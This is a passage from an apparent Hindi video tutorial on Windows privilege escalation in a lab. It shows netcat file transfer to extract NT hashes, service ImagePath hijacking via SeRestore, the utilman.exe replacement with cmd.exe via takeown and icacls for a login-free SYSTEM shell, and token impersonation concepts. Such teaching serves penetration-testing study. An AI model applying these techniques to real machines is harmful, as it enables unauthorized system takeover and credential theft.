यहाँ वापस आते हैं, सिस्टम को यहाँ पे कर देते हैं, और थोड़ा सा टाइम दो, से 5-1 मिनट। ये जस्ट ऑल्टरनेटिव है, बहुत अच्छा मेथड तो नहीं है, बट
काफ़ी बार ये मेरे लिए काम कर जाता है जब कुछ नहीं कर रहा होता, क्योंकि बहुत कई बार बहुत गंदे शेल आपको मिलते हैं नेटकैट से जो बार-बार ब्रेक हो रहा है, काम नहीं कर रहा है। तो उसमें सिर्फ़ नेटकैट काम कर पाता है, उसमें आप एफ़टीपी नहीं कर पाते, उसमें ढंग से कई बार एसएमबी ब्लॉक होता है, एसएमबी तो काफ़ी बार मुझे ब्लॉक भी मिल जाता है, रिस्ट्रिक्शंस लगाए होते हैं। तो ऐसे में नेटकैट काफ़ी बार काम कर जाता है, उससे ट्रांसफ़र हो जाता है। तो एक डर्टी मेथड है लेकिन वर्किंग है, ठीक है? तो आप यूज़ कर सकते हो कभी ना कभी। अब थोड़ी देर हो गई है, इसको कंट्रोल सी करते हैं, अब तक तो ट्रांसफ़र हो जाना चाहिए। तो दोबारा से मैं एक बार एलएसएलए कर लेता हूँ, ठीक है? अब सही लग रहा है साइज़, पिछली बार और इसमें कंपैरिजन करोगे तो यहाँ पे अब साइज़ पहले से बेटर लग रहा है। देखते हैं अब इसको रन करके एंड डन, ठीक है? तो ये मत सोचना ये मेथड काम नहीं करता, बट थोड़ा सा टाइम लगता है पर हो जाता है। तो ये हमारा ट्रांसफ़र हो गया और हमारे को यहाँ पे मिल गया है, हमारी एंटी हैश मिल गया है, सारे जितने भी यूज़र्स थे सिस्टम पे उन सबका एंटी हैश मिल चुका है, ठीक है? तो ये हो गया हमारा पहला तरीका कि सी बैकअप की मदद से कैसे फाइल रीड की अगर परमिशन हो आपके पास पूरे सिस्टम में ओवरऑल, तो आप उसकी मदद से कैसे प्रिविलेज एस्केलेशन कर सकते हो। वापस चलते हैं अपने टारगेट पे। अब जो हमारा नेक्स्ट तरीका है सी रिस्टोर, वो बहुत सिंपल है। आपको सोचो सीधा-सीधा ये परमिशन दी गई है कि आप कहीं पे भी कुछ भी राइट कर सकते हो, किसी भी रजिस्ट्री के अंदर, किसी भी फाइल के अंदर, तो बहुत आसान है इससे प्रिविलेज एस्केलेशन करना। अब अगर आप लोगों को लग रहा है कि जैसे लिनक्स में आप लोग करते हो यूजुअली कि अगर मेरे पे राइट की परमिशन होगी, तो सबसे सिंपल और ईज़ी मेथड होता है कि मैं ईटीसी पासवर्ड या ईटीसी शैडो में जाके अपना खुद का हैश वहाँ पे रख दूँगा, अपना खुद का नया यूज़र बना दूँगा या रूट यूज़र का पासवर्ड हैश बदल दूँगा। लेकिन विंडोज़ में वो मेथड आपके लिए काम नहीं करेगा। विंडोज़ में अगर आप सोचोगे मैं सैम को ओवरराइट कर दूँ, सिस्टम को ओवरराइट कर दूँ, तो बिल्कुल मत करना, जब तक आपको पता ना हो कि आप कर क्या रहे हो। सैम और सिस्टम विंडोज़ में बहुत क्रूशियल है और सिर्फ़ पासवर्ड को मैनेज नहीं करते, ठीक है? तो आपको ये याद रखना है कि गलती से भी आपने सिस्टम को अगर गलत तरीके से ओवरराइट कर दिया, तो आपका सिस्टम बूट भी नहीं होगा, वो ओपन ही नहीं होगा, क्योंकि अगर सिस्टम करप्ट हो गई, तो आपका सिस्टम भी बूट नहीं होने वाला, उसके अंदर बूट की रहती है, बहुत इंपॉर्टेंट है। तो उसको बिल्कुल मत छेड़ना अगर आपको नहीं पता आप क्या कर रहे हो। इसका सबसे सिंपल तरीका इसका एक्सप्लॉइटेशन करने का, ठीक है? मैं दिखाऊँगा नहीं क्योंकि मैं ऑलरेडी आपको एक वीडियो में सिखा चुका हूँ वो तरीका। वो होने वाला है रजिस्ट्री, क्योंकि आप हर रजिस्ट्री में राइट कर सकते हैं। इससे जस्ट पिछली वीडियो में हमने देखा था कि कैसे हम सर्विसेज़ की मदद से प्रिविलेज एस्केलेशन कर सकते हैं, तो सेम यहाँ पे हम कर सकते हैं। उसमें हमने एक तरीका पढ़ा था कि अगर हमारे पे इनसिक्योर परमिशंस दी गई हैं रजिस्ट्री पे, तो कैसे हम सर्विसेज़ की वैल्यूज़ को ओवरराइड कर सकते हैं, ठीक है? तो फॉर एग्जांपल मैंने बताया था कि ऐसे एक रजिस्ट्री ऐड रेग ऐड करेंगे, कोई भी सर्विस है जो सिस्टम के प्रिविलेजेस के साथ रन कर रही है, ठीक है? उसके सिस्टम के प्रिविलेज हैं और ऑटो स्टार्ट होती है, यानी कि हर रीबूट पे अपने आप स्टार्ट होती है। तो आप जाके सीधा उस सर्विस में उसकी रजिस्ट्री के अंदर जो उसका इमेज पाथ है, ठीक है? इमेज पाथ, उसमें वहाँ पे वैल्यू में shell.exe रख सकते हो अपनी, और जैसे ही वो सर्विस स्टार्ट होगी आपको शेल मिल जाएगा। ये सेम तरीका मैंने पूरा पढ़ाया था इन डेप्थ, उस वाली वीडियो में आप देख लेना। बस अब क्या होगा, उसमें पिछली बार क्या था कि एक कोई रजिस्ट्री इनसिक्योर परमिशंस थी इसलिए हम कर पा रहे थे। इस बार ये नहीं है। इस बार केस क्या है कि आपको ये परमिशन दी गई है कि आप पूरे सिस्टम पे कहीं पे भी कुछ भी राइट कर सकते हो, किसी भी रजिस्ट्री में कुछ भी लिख सकते हो। तो आप जैसे ही ये कमांड रन करोगे किसी भी सर्विस के लिए, वो कोई भी सर्विस हो सकती है, सिस्टम विंडोज़ की अपनी कोई एंटीवायरस सर्विस हो, डिफेंडर की कुछ भी हो, आप जाके उसको ओवरराइट करो, ठीक है? और वहाँ पे shell.exe का इमेज पाथ रख दो और डन, आपका काम हो जाए। जैसे ही वो सर्विस रीस्टार्ट होगी आपको शेल मिल जाएगा एंटी अथॉरिटी सिस्टम का। तो बहुत सिंपल टेक्निक है, वो आप कर सकते हो यहाँ पे, ये हमने ऑलरेडी पढ़ लिया था। अब हम अपने नेक्स्ट प्रिविलेज को पढ़ने के लिए चलते हैं। तो उसके लिए हमारे को क्या करना पड़ेगा, इसको बंद करना पड़ेगा इस सेशन को। उसके लिए दूसरे यूजर नेम पासवर्ड लगेंगे, तो इसको बंद कर लेते हैं सबसे पहले। अब मैं यहाँ पे क्या काम करूँगा, ब्राउज़र पे आने के बाद नीचे जाऊँगा और हमारा जो नेक्स्ट प्रिविलेज होने वाला है, सी टेक ओनरशिप होने वाला है हमारा नेक्स्ट। तो यहाँ पे इसका जो यूज़र नेम पासवर्ड है इसको कॉपी कर लो, ठीक है? और मैं कॉपी कर लेता हूँ यहाँ पे, और वापस अब हम लॉगिन करते हैं। वापस रेमिना का यूज़ लूँगा, एंटर मारते हैं, यूज़र नेम में यूज़र नेम डालेंगे और पासवर्ड को भी मैं कॉपी कर लेता हूँ यहाँ से। पासवर्ड में पासवर्ड डालेंगे, एंटर मारते हैं यहाँ पे, ठीक है? अब इसको बड़ा कर लेते हैं और यहाँ पे भी डायनामिक रेजोल्यूशन को अनेबल कर देंगे ताकि ये फुल स्क्रीन में हो जाए। ये वही सेम मशीन है, बस उस पे एक दूसरा यूज़र है, ठीक है? अब यहाँ पे हम आते हैं और यहाँ पे सीएमडी को ओपन कर लेते हैं। अब यहाँ पे आते हैं। अब देखो उसमें मैंने क्या काम करा था, उस यूज़र में मैंने जो फ़ॉन्ट साइज़ था उसको 20 कर दिया था, ठीक है? और उसकी मैं डिफ़ॉल्ट वैल्यू को भी 20 सेट कर सकता था। लेकिन जब मैं इस यूज़र पे आऊँगा वो फ़ॉन्ट साइज़ नहीं होगा, मतलब उस यूज़र पे जब मैं जाऊँगा तो मेरा फ़ॉन्ट साइज़ हमेशा 20 ही रहेगा। लेकिन जब मैं वापस अब नए यूज़र पे आया हूँ तो इसका फ़ॉन्ट साइज़ 16 है। ये सारी सेटिंग्स आपको कहाँ लगता है, कहाँ स्टोर कर रहा है विंडोज़? रजिस्ट्री में। तो मेरी जो करंट यूज़र है उसकी एक अपनी रजिस्ट्री हाइव रहती है,
ठीक है, उस हाइव के अंदर वो स्टोर करता है कि ये जो सीएमडी है, सीएमडी का फॉन्ट का स्टाइल क्या होने वाला है, उस यूज़र को क्या पसंद है, कलर क्या पसंद है, कितना साइज़ पसंद है टेक्स्ट का, सब कुछ वो स्टोर करके रखता है। जब वो यूज़र लॉगिन करता है, सीएमडी ओपन करता है, तो सीएमडी चेक करेगा रजिस्ट्री में यूज़र की प्रेफरेंसेस क्या है और वो अनेबल कर देता है। अब ये जो यूज़र है, इसने पहली बार लॉगिन करा, इसकी कोई प्रेफरेंस नहीं है, तो ये डिफ़ॉल्ट प्रेफरेंसेस के साथ ओपन होता है। तो रजिस्ट्री में हर वो चीज़ रहती है जो कि विंडोज़ को चेक करनी पड़ती है कि ये शायद मेरे को अप्लाई करना पड़ सकता है, वो सेटिंग, वो कॉन्फ़िगरेशन, तो वो वहाँ पे सेव रखता है। 20 इसको बाहर कर लेंगे। अब यहाँ पे आते हैं और नेक्स्ट हमारी क्या होने वाली है, इसमें भी सेम रहने वाला है। अच्छा, एक चीज़ दिखाऊँ, हु एम आई प्रेव, प्रेव करते हैं और यहाँ पे हम आते हैं और आपको दिखेगा कि यहाँ पे जो प्रिविलेजेस हैं वो अगेन आपको पूरे नहीं दिख रहे हैं, इसको फिर से बंद करना पड़ेगा हमारे को। और यहाँ पे CMD को करेंगे, रन एज एडमिनिस्ट्रेटर करेंगे, ताकि हमारे को अपनी ट्रू पोटेंशियल दिखे पूरा। यहाँ पे पासवर्ड को डालेंगे, यस करेंगे और ये हमारा यहाँ पे ओपन हो गया। ठीक है, अब मैं यहाँ पे क्या काम करूँगा, अगेन हु एम आई, और यहाँ पे हम वही सेम यूज़र है, लेकिन इस बार जब मैं प्रिव करूँगा तो आपको दिखेगा कि एक नई प्रिविलेज हमारे पास आ गई है, टेक ओनरशिप प्रिविलेज। ठीक है, अब ये आपको यहाँ पे नाम से समझ आ रहा है कि ये क्या कह रहा है कि अब मैं किसी भी फाइल का ओनरशिप ले सकता हूँ। तो भाई इससे क्या हो सकता है, मतलब मैं किसी भी फाइल की ओनरशिप ले पा रहा हूँ। तो बेसिकली यहाँ पे यही कह रहे हैं कि हम किसी भी फाइल का फुल कंट्रोल ले सकते हैं, उस पर रीड कर सकते हैं, राइट कर सकते हैं। अगेन वही चीज़ है रीड राइट वाली, लेकिन ये थोड़ा सा डिफरेंट घुमा के कि किसी भी फाइल के पूरा ओनर मैं बन सकता हूँ, अपने आप को किसी भी फाइल, किसी भी रजिस्ट्री का पूरा ओनर बना सकता हूँ। ओनर बनाने का मतलब देखो परमिशंस कैसे काम करती है कि अगर किसी फाइल को मैंने बनाया, कोई मेरी फाइल है, मेरे पर्सनल यूजर की फाइल है, तो मैं उसका ओनर हूँ, मैं ही उसकी परमिशंस को सेट कर सकता हूँ। मेरे को अगर किसी दूसरे यूज़र को उसकी परमिशंस देनी है तो मैं ही दे सकता हूँ। मैं कहूँगा कि भाई एक दूसरा यूज़र है, गेस्ट यूज़र, उसको फुल कंट्रोल दे दो इस वाली फाइल या फोल्डर पे। ठीक है, या इसको खाली रीड ओनली दे दो या राइट दे दो। तो जो ओनर है वो उस फाइल के प्रिविलेजेस को कंट्रोल कर सकता है। अब ये जो प्रिविलेज है ये नहीं कहती डायरेक्टली कि आप किसी भी फाइल पे रीड एंड राइट कर सकते हो, जैसे सी रीस्टोर कह रही थी या सी बैकअप कह रही थी। सी टेक ओनरशिप ऐसा नहीं कहती कि आप किसी भी फाइल पे रीड एंड राइट, पर वो कहती है कि आप किसी भी फाइल के ओनर बन सकते हो। अब ओनर बनने का मतलब क्या क्या, अगर मैं किसी भी फाइल का ओनर बन सकता हूँ ना, ओनर बनने का मतलब ये होता है कि अब ओनर ही, जो ओनर होता है वही उस फाइल की परमिशंस को डिफाइन करता है। तो मैं फिर उसके बाद उसकी अब मैं ओनर बन गया उस फाइल का, तो मैं बोलूंगा कि मेरे ही यूजर को इसका फुल कंट्रोल दे दो। पहले मेरे पे रीड ओनली था, तो पहले मैं उसका ओनर बनूंगा उस फाइल का। अब मैं, क्योंकि मेरे पे ये प्रिविलेज है, अब मैं उसका ओनर बन गया। अब मैं ओनर हूं तो मैं अपनी फाइल पे कोई भी प्रिविलेज सेट कर सकता हूं, तो मैं बोलूंगा इस फाइल का मेरे को फुल एक्सेस दे दो। तो ये वैसे ही काम करते हैं। तो अब इससे भी आप सेम तरीके से कर सकते हो कि आप क्या काम कर सकते हो, सैम और सिस्टम जो है ना उसके ओनर बन जाओ। पहले ओनर बनना पड़ेगा, याद है। सैम और सिस्टम के ओनर बन जाओ, और ओनर बनने के बाद तो फिर आप उसको बोल सकते हो कि मेरे को इस पे राइट के प्रिविलेज दे दो। ये तरीका लेकिन हमने सीख लिया है, रजिस्ट्री वाला तरीका भी हमने सीख लिया कि रजिस्ट्री से कैसे सर्विस को ओवरराइड कर सकते हैं और उससे कर सकते हैं। अब हम कोई नया तरीका सीखते हैं। ठीक है, नया तरीका क्या है, एक बहुत बढ़िया सी ट्रिक होती है जो काफ़ी पहले यूज़ होती थी, परसिस्टेंस के लिए भी काफ़ी पहले यूज़ होती थी, और काफ़ी बार बाईपासिस के लिए भी यूज़ हुई इससे पहले। आप अगर विंडोज़ की हिस्ट्री पढ़ोगे, वही तरीका हम यूज़ करने वाले हैं। तो सबसे पहले मैं क्या काम करूँगा, यहाँ पे एक कमांड होता है टेक ओन, ओनरशिप लेने के लिए, जिसे हम कहते हैं। अब देखो इसका स्टेटस डिसेबल्ड है, तो इस पर ध्यान मत देना कि ये डिसेबल्ड है, काम नहीं करेगा। ऐसा कुछ नहीं है, ये अपने आप काम कर जाएगा ऑटोमेटिकली। विंडोज़ इसको अनेबल कर देगा। ठीक है, आपको कभी नहीं दिखेगा, आप सोचोगे कि अनेबल हो जाएगा तो आपको यहाँ पे अनेबल दिखेगा, आपको नहीं दिखेगा। तो ऊपर विंडोज़ क्या काम करेगा, जैसे ही मैं इससे रिलेटेड कोई भी कमांड रन करूँगा, वो इंटरनली इसको अनेबल कर देगा और फिर ओनरशिप चेंज कर देगा। ठीक है, तो यहाँ पे मैं लिखूंगा टेक ओन, यानी कि ओनरशिप के लिए लिखते हैं। और किसकी ओनरशिप लेनी है, एक फाइल की ओनरशिप लेनी है। कौन सी फाइल की, सी विंडोज़ के अंदर सिस्टम 32 के अंदर यूटिल मैन .exe, यहाँ पे हम कर देते हैं। और सक्सेस हो गया, इसके ओनर हम बन गए। अभी सिर्फ ओनर बने हैं, ऐसा नहीं कि इसके बाद मैं इसमें रीड कर सकता हूँ, राइट कर सकता हूँ। जब तक मेरे पे वो प्रिविलेजेस नहीं होंगे मैं नहीं कर सकता। अब यूटिल मैन होता क्या है, बहुत सिंपल है। यूटिल मैन होता है, जैसे फॉर एग्जांपल अगर मैं यहाँ पे ना अपने को लॉक कर दूँ, फॉर एग्जांपल ये लॉक पे यहाँ पे मैं गया, तो ये आता है यहाँ पे ईज एक्सेस, आप कह लो ईज ऑफ एक्सेस आता है कि मतलब अगर आप स्पेशली एबल्ड हो, आप सुन नहीं सकते, आप देख नहीं सकते, तो उसके लिए यहाँ पे कुछ ऑप्शंस बनाए हैं विंडोज़ ने, ताकि ये आपको स्पेल आउट करके चीज़ें बता सकती है। ठीक है, या डिफरेंट डिफरेंट चीज़ें यहाँ पे ये कर सकती है। मेरे ख्याल से कीबोर्ड भी देती है, वर्चुअल कीबोर्ड, अगर आपका कीबोर्ड खराब है तो वो सब चीज़ें। तो ये कैसे होता है, जैसे ही मैं इस पर क्लिक करता हूँ तो जो utilman.exe है सिस्टम 32 के अंदर, वो रन होती है और वो हमारे को यहाँ पे फिर सारा मेन्यू वगैरह दिखाती है। बेसिकली ये बस उसके लिए एक फ्रंट एंड का बटन है, जैसे ये क्लिक करते हैं utilman.exe एग्जीक्यूट हो जाती है। और इसकी खासियत पता है क्या है कि ये हमेशा सिस्टम के प्रिविलेजेस के साथ रन करती है। तो जब भी मैं इस पर क्लिक करूंगा
तो ये सिस्टम के प्रिविलेजेस के साथ ये सारी ऑप्शंस जो आती है ना, मेरे को ये सारे सिस्टम के प्रिविलेजेस के साथ आती है। ये जो ऑप्शन दिख रहा है ये utilmain.exe मेरे को दे रहा है, और ये सब एंटी अथॉरिटी सिस्टम के प्रिविलेजेस के साथ रन कर रहा है, ठीक है। अब यहाँ पे वो मैटर नहीं करता क्योंकि हमारे को दिख ही नहीं रहा यूजर नेम या वो क्या, यहाँ पे कुछ खास है नहीं। लेकिन अगर मैं इस फाइल को utilmain.exe को रिप्लेस कर दूँ cmd.exe से, तो जैसे ही मैं इस बटन को क्लिक करूंगा cmd.exe एग्जीक्यूट होगा इंस्टेड ऑफ utilmain.exe, वो भी एंटी अथॉरिटी सिस्टम के प्रिविलेजेस के साथ। तो ये एक छोटी सी ट्रिक होती है लेकिन बढ़िया ट्रिक है, और इससे क्या होगा कि आप विदाउट लॉगिन ही उस सिस्टम का शेल ले पाओगे। मतलब ये आप सोचो कि लॉगिन भी करने की जरूरत नहीं विंडोज़ में, और उसका आप शेल ले पाओगे जब भी आप लेना चाहोगे। बस आपको ये बटन क्लिक करना है, बूम, आपको एक CMD ओपन हो जाएगा एंटी अथॉरिटी सिस्टम का, ठीक है। अब यहाँ पे पासवर्ड डाल के वापस से लॉगिन कर लेते हैं, ठीक है। अब यहाँ पे आ गए, अब हमने इसको ओनर बन गए थे हम लोग। तो ओनर बनने के बाद अब मैं इसकी परमिशंस को चेंज करूंगा। वो मैंने आपको सिखाया था सबसे पहली वाली वीडियो में प्रिविलेज एस्केलेशन में, कि आई कैल्क्स यूज़ कर सकते हैं हम उसके लिए। आई कैल्क्स पहले से विंडोज़ में आता है जो परमिशंस का काम करता है, एक्सेस चेक भी करता है ये काम, लेकिन आई कैल्क्स विंडोज़ में पहले से इंस्टॉल आता है, उसकी तरफ से आता है, माइक्रोसॉफ्ट की तरफ से। तो सी विंडोज़ सिस्टम, और ये आप ग्राफिकली भी कर सकते हो, मतलब मैं यहाँ से कर रहा हूँ, आप ग्राफिकली प्रॉपर्टीज़ में जाके उसकी परमिशंस को चेंज कर सकते हो, अपने आप को फुल एक्सेस दे सकते हो utilmain.exe। और यहाँ पे मैं क्या बोलूँगा, ग्रांट, और जो हमारा यूज़र नेम है, हमारा यूज़र नेम क्या था ये, एक तो यूज़र नेम भी इतना लंबा है, ठीक है। इस यूज़र नेम को क्या ग्रांट कर दो, फुल एक्सेस ग्रांट कर दो, ठीक है। तो यहाँ पे मैं लूँगा फुल एक्सेस, रीड राइट सब कुछ, डिलीट सारा एक्सेस दे दो। तो ये सक्सेसफुली हो गया। तो ये सक्सेसफुली हमारा, हम अब इसके पूरे ओनर, मतलब मैं कुछ भी कर सकता हूँ utilmain.exe। अब बहुत सिंपल है, मैं क्या बोलूँगा, कॉपी कर दो, पाथ दे देते हैं यहाँ पे, ये cmd.exe को utilmain.exe के ऊपर, क्योंकि अब मैं इसको, क्योंकि मेरे पे फुल एक्सेस है तो मैं इसको ओवरराइट भी कर सकता हूँ, ठीक है। यहाँ पे y देंगे, एंटर मारते हैं, वन फाइल कॉपीड। अब क्या होगा कि utilmain.exe के नाम पे एक्चुअली cmd.exe आ गई है, तो जब भी utilmain.exe एग्जीक्यूट होगी उसकी जगह cmd.exe ओपन हो जाएगा, ठीक है। और जो भी प्रिविलेज इसके साथ utilmain.exe एग्जीक्यूट होती थी, उसी प्रिविलेज के साथ अब cmd.exe एग्जीक्यूट होगी। और इस बार मैं क्या काम करूँगा, यहाँ पे ऑप्शन आता होगा ना सेटिंग्स में, एक मिनट, हाँ ठीक है, कंट्रोल ऑल्ट डिलीट देंगे ये वाला ऑप्शन। यहाँ से भी आपको मिल जाएगा ईज ऑफ एक्सेस, ईज ऑफ एक्सेस पे क्लिक करेंगे और अब आपको दिखेगा कि CMD हमारा ओपन हो गया, हु एम आई NVR एंटी अथॉरिटी सिस्टम। इसको लग रहा है कि इसने utilmain.exe को ही एग्जीक्यूट करा, लेकिन उसकी जगह हमने cmd.exe रख दी थी और हमारे को शेल मिल गया। तो एक कूल ट्रिक, और ये करा जा सकता है, एक अच्छी चीज़ है। अब हम चलते हैं और इसको हटाते हैं, कैंसिल करते हैं, और अपने लास्ट प्रिविलेज को देखते हैं जो हम सीखने वाले। दो प्रिविलेजेस होने वाले हैं, मतलब दो प्रिविलेज लेकिन एक जैसे ही है वो, जैसे सी बैकअप सी रिस्टोर था, लगभग एक जैसी, वैसे ही अपने दो प्रिविलेजेस जो हम देखने वाले लास्ट के, उनके बारे में समझते हैं। तो अब हम RDP से ब्राउज़र में चलते हैं एक्चुअली, और यहाँ आने के बाद इसकी जो IP है उसको कॉपी कर लेंगे। इसकी IP थी ये, ठीक है। एक नया टैब खोलेंगे और यहाँ दे देंगे HTTP और IP दे देंगे यहाँ पे, ठीक है। अब यहाँ पे हमारे को शेल मिल गया। बेसिकली इन्होंने पता नहीं क्यों ऐसा इंटरफेस बनाया, मुझे समझ नहीं आ रहा, बट इन्होंने कहा है कि जो ये वाले प्रिविलेज हैं जो हमारे को एक्सप्लॉइट करने हैं, वो वाले जो प्रिविलेज हैं वो सिर्फ आप जब वेब वाला शेल लोगे तो वहाँ मिलेंगे आपको, ठीक है। तो यहाँ पे आते हैं और अब हम देख लेते हैं हु एम आई, तो कौन सा यूज़र है हम सबसे पहले। तो हम डिफ़ॉल्ट ऐप पूल यूज़र हैं, ठीक है, जो बाय डिफ़ॉल्ट IIS का यूज़र होता है, यानी कि जैसे www डेटा होता है लिनक्स के अंदर, यहाँ पे ये वेब सर्वर का डिफ़ॉल्ट यूज़र होता है यहाँ पे विंडोज़ के केस में। अब इसके प्रिविलेजेस देख लेते हैं, /priv रन करते हैं और यहाँ पे हमारे को सारे प्रिविलेजेस आ गए। अब यहाँ पे हमारे को दो मेन प्रिविलेज देखने हैं, एक होने वाला सी इम्पर्सोनेट प्रिविलेज और एक होने वाला सी असाइन प्राइमरी टोकन प्रिविलेज। ये दोनों एक जैसे ही काम करते हैं, दोनों में कोई फर्क नहीं आने वाला एक्सप्लॉइटेशन में। आप सोचो, आपके लिए कोई फर्क नहीं है दोनों में, चाहे ये वाला हो चाहे ये वाला हो, आपके लिए कोई फर्क नहीं है दोनों में। बस थोड़ा सा जो इसकी अंडर द हुड वर्किंग है, जो इसका बैकएंड है, थोड़ा सा अलग है, थोड़े से अलग लेवल्स पे काम करता है, लेकिन आपके लिए जब आप एक्सप्लॉइटेशन करते हो तो आपके लिए दोनों बिल्कुल सेम है, आपके लिए दोनों कोई असर नहीं डालते। अभी समझेंगे इनको क्या है। लेकिन एक इंटरेस्टिंग पॉइंट ये होता है विंडोज़ के केस में कि सी इम्पर्सोनेट प्रिविलेज और सी प्राइमरी टोकन प्रिविलेज, इसके लिए यहाँ पे यूएसी नहीं लगता, ये देखने के लिए यूएसी नहीं लगता। स्पेसिफिकली सी बैकअप, टेक ओनरशिप या सी रिस्टोर, इनके लिए यूएसी लगाता है विंडोज़। उसको लगता है कि वो बहुत खतरनाक है, और है भी, मतलब उसको क्या लगता है,
पर इसके लिए नहीं लगाता क्योंकि इसमें एक प्रोटेक्शन है जिसके बारे में हम बात करेंगे, इसलिए शायद वो यूएसी नहीं लगाता। मेरे को नहीं पता विंडोज़ का क्या कारण है इसके पीछे, पर ये दिखाने के लिए, ये वाले प्रिविलेजेस दिखाने के लिए आपको यूएसी डालने की जरूरत नहीं होती है, डायरेक्टली आपको हु एम आई प्रिव करके दिख जाते हैं। इन केस ऑफ सी रिस्टोर, बैकअप, टेक ओनरशिप, उसमें आपको यूएसी से जाना पड़ता है, यूएसी बीच में पड़ता है, ठीक है। अब यहाँ पे बात करते हैं करते क्या है। तो बेसिकली ना आपको पहले विंडोज़ को थोड़ा सा समझना पड़ेगा। विंडोज़ में एक कॉन्सेप्ट होता है टोकन्स का। अब मैं इसकी इंटरनल वर्किंग में नहीं जाना चाहता, पर मैं आपको कॉन्सेप्चुलाइज कराना चाहता हूँ, आपको समझाना चाहता हूँ कि टोकन्स होते कैसे हैं, ताकि आप इसका एक्सप्लोरेशन समझ पाओ। तो बहुत सिंपल कॉन्सेप्ट है टोकन्स का विंडोज़ के अंदर। तो टोकन्स को आप ऐसे समझ सकते हो जैसे वेबसाइट्स में कुकीज़ होती हैं, जैसे पीएचपी सेशन आईडी हो गई, तो एक टोकन वैल्यू मिलती है, कुकी मिलती है हर यूज़र को, ठीक है, जिससे डिफाइन होता है कि एक तो वो ऑथेंटिकेटेड है और उसका क्या क्या एक्सेस है, वो क्या क्या चीज़ों को एक्सेस कर सकते हैं, कितनी पावर्स है, क्या क्या चीज़ों को वो देख सकता है, वो टोकन, वो कुकी उसका डिसाइड करती है। सेम ऐसा ही आप ये जो टोकन का कॉन्सेप्ट है विंडोज़ में भी अप्लाई कर सकते हो कि विंडो में हर यूज़र को एक टोकन मिलता है। और ये वाली जो प्रिविलेजेस हैं ये हमारे को कुछ नहीं कहती, ये प्रिविलेज हमारे को कहती है कि अगर आपके पास दूसरे यूज़र का, ठीक है, अगर आपके पास दूसरे यूज़र का टोकन या कुकी है, तो आप क्या काम कर सकते हो, उनके प्रिविलेजेस के साथ आप प्रोसेसेस को रन कर सकते हो। इतना सिंपल होता है। तो बेसिकली फॉर एग्जांपल मैं ये कह रहा हूँ, सोचो कि अगर मैं किसी और की कुकी चुरा लूँ, ठीक है, किसी और का टोकन चुरा लूँ, तो मैं क्या करूँगा। आप एक हैकर हो, आप एक वेबसाइट को हैक करते हो, आप किसी और की कुकी चुरा लेते हो, तो आप उस कुकी से क्या कर सकते हो, आप उसके सेशन में लॉग इन कर सकते हो, उसकी तरह बिहेव कर सकते हो, उसका अकाउंट देख सकते हो। यही सब विंडोज़ में भी हो सकता है। लेकिन यहाँ पे डिफरेंस कहाँ आता है, देखो जब हम वेबसाइट की बात कर रहे हैं, वेबसाइट में अगर मैंने किसी की कुकी चुरा ली तो क्या होगा, बस मेरे को अपने ब्राउजर में उसकी कुकी डालनी है और मैं उसकी तरह लॉग इन हो जाऊंगा। बिल्कुल सिंपल कॉन्सेप्ट होता है। लेकिन जब हम विंडोज़ की बात करते हैं, विंडोज़ में इतना सिंपल नहीं है। फॉर एग्जाम्पल अगर मैंने इन केस किसी का टोकन चुरा भी लिया, किसी की कुकी चुरा भी ली, तो मेरे पास ये वाली प्रिविलेज होने चाहिए। ये प्रिविलेज दिख रहे हैं मेरे पास, ये प्रिविलेज होने चाहिए, दो प्रिविलेज, इनमें से कोई एक, मतलब इन दोनों में से कोई भी काम करेगा। इन दोनों में से कोई भी एक प्रिविलेज अगर मेरे पास होगा, तो मैं उस टोकन की मदद से, जो कि दूसरे यूजर का टोकन है, उस टोकन की मदद से मैं नए प्रोसेसेस को रन कर सकता हूं, जो प्रोसेसेस उसी यूजर के प्रिविलेजेस के पावर्स के साथ रन करेंगे, ठीक है। तो आई होप सो ये थोड़ा क्लियर हुआ हो मैं क्या कह रहा हूँ। तो बेसिकली ये प्रिविलेजेस बहुत सिंपल है। ये प्रिविलेजेस हमारे को हेल्प करती हैं कि अगर मेरे को किसी और यूजर का टोकन मिल जाए, तो मैं उस टोकन को रिप्ले करके, ठीक है, उस टोकन की मदद से नए प्रोसेसेस को रन कर सकता हूँ। और वो प्रोसेस कौन सी प्रिविलेजेस के साथ रन करेंगे, जिस यूजर का वो टोकन है, ठीक है। तो बिल्कुल वेबसाइट वाला कॉन्सेप्ट है। अब यहाँ पे आता है तो फिर इन दोनों में डिफरेंस क्या है, मतलब दोनों यही काम कर रहे हैं, तो दोनों में डिफरेंस बस इतना सा होता है कि जो सी इम्पर्सोनेट प्रिविलेज है ये थ्रेड पे काम करता है। ऐसे मान सकते हो कि ये एक टेम्पररी बेसिस पे काम करता है। ये जो प्रोसेस चालू होता है उस प्रोसेस की एक थ्रेड पे इस टोकन को हम लगा सकते हैं, और प्राइमरी टोकन एक पूरे प्रोसेस को ही उस टोकन के साथ रन करता है। तो प्रोसेस बड़ा होता है, प्रोसेस के अंदर मल्टीपल थ्रेड्स होती है। तो सी इम्पर्सोनेट प्रिविलेज की मदद से हम क्या काम कर सकते हैं, उस टोकन के प्रिविलेजेस के साथ एक थ्रेड को रन कर सकते हैं, और यहाँ पे हम एक पूरे प्रोसेस को रन कर सकते हैं। बस इतना फर्क है। ये ऐसे मान सकते हो ये उससे भी बड़ा लेवल, सी इम्पर्सोनेट प्रिविलेज इसका थोड़ा छोटा वर्जन है और ये उससे बड़ा है। तो ये पूरे प्रोसेस को रन कर सकता है उस टोकन के साथ। प्रोसेस के अंदर मल्टीपल थ्रेड्स हो सकती हैं, और ये एक थ्रेड के लिए होता है स्पेसिफिकली, ऐसा मान सकते हो आप। जस्ट इतनी डिफरेंस होती है। आपके लिए कोई डिफरेंस नहीं है, आपको सेम दिखेगा, क्योंकि एक प्रोसेस जिसमें एक ही थ्रेड है उसके लिए ये भी सेम काम करेगा, ये भी सेम काम करेगा, आप ऐसे मान सकते हो। तो आपके लिए यहाँ पे कोई फर्क नहीं है, एक्सप्लॉइटेशन में आपके लिए कोई फर्क नहीं आएगा। बट ये थोड़े बड़े लेवल पे काम करता है, थोड़ा उससे छोटे लेवल पे काम करता है, इतना आपको समझना है। लेकिन वर्किंग दोनों की सेम है। दोनों क्या काम करते हैं कि टोकन को रिप्ले करते हैं। एक बार इनको किसी दूसरे यूजर का टोकन मिल जाए, तो ये क्या काम कर सकते हैं, इस प्रिविलेज की मदद से हम उन टोकन्स को यूज करके नए प्रोसेसेस जनरेट कर सकते हैं, रन कर सकते हैं, और वो नए जो प्रोसेसेस होंगे वो जो टोकन था जिस यूजर का उसके प्रिविलेजेस के साथ रन करते हैं। लेकिन आपको एक चीज याद रखनी 